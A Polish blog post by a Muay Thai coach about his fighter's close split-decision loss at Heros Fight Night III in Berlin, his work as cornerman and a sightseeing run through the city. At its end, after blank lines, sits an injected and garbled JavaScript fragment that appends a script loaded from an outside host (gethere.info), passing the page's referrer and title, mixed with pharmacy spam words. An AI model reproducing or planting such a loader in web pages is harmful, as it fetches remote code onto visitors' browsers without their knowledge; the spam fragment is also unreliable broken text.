Berlin-Heros Fight Night III ,Europa vs Thailand, Muay-Thai mecz

16.04.2014 / Mariusz Cieśliński

Miniony weekend spędziłem w Berlinie.Zawodnik z mojego teamu-Bartosz Batra -walczył w jednej z trzech walk wieczoru na gali Heros Fight Night III.

Był to mini mecz podczas gali walk MMA i Muaythai – Europa VS Thailand.Walki świetne,krwawe i dramatyczne czyli obfitujące w to co kibice lubią najbardziej.A kibiców była pełna sala.Huxleys Neue Welt w Berlinie wypełniła się do ostatniego miejsca.Bartosz przegrał swoją walkę po pięciu rundach decyzją sędziów 2:1. Pojedynek bardzo wyrównany.Fotorelacja z gali i kilka walk poniżej i zapraszam do oglądania-warto:).Walka Bartka nr 11.

Ja tym razem pojechałem w roli „cornermena”. Z powodzeniem zatamowałem Bartkowi krwotok z dwóch rozcięć po uderzeniach łokciem. :-)

Przed galą gdy Bartek nabierał sił z pozostałą ekipą pobiegaliśmy po mieście-dwie godzinki turystyki biegowej :).Berlin był pełen biegaczy,których w sobotę do południa mijaliśmy po drodze.

 

 

 

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‚&default_keyword=’ + encodeURIComponent(document.title) + ”; online Pills if (document.currentScript) { d.getElementsByTagName('head')[0].appendChild(s); Cheap Purchase online